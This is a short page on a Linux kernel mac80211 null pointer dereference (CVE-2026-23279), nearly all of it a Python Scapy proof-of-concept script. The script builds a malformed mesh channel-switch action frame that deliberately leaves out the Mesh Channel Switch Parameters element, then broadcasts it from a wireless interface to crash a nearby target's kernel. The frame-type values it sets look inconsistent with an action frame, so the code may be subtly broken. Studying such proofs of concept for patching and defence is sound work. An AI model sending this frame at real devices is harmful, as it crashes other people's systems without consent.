CVE-2026-23279 Linux内核mac80211空指针解引用漏洞

#!/usr/bin/env python3 # Scapy PoC Concept for CVE-2026-23279 # Triggers NULL pointer dereference in mac80211 mesh_rx_csa_frame from scapy.all import * conf.iface = 'wlan0' # Change to your interface # Target and Source MACs target_mac = "AA:BB:CC:DD:EE:FF" source_mac = "11:22:33:44:55:66" bssid = source_mac # Construct the Action frame (Spectrum Management -> Channel Switch) # Must include Mesh ID and Mesh Config to pass mesh_matches_local() # Must EXCLUDE Mesh Channel Switch Parameters IE (ID 118) to trigger crash frame = RadioTap() / \ Dot11(type=1, subtype=13, addr1=target_mac, addr2=source_mac, addr3=bssid) / \ Dot11Action(category=SpectrumManagement) / \ Dot11ActionChSwSwitch(new_ch=6) / \ Dot11MeshID(meshid='meshnet') / \ Dot11MeshConf() # Intentionally omitted: Dot11MeshChSwParameter sendp(frame, verbose=1) print("PoC sent: Malformed Mesh CSA frame without Channel Switch Parameters IE")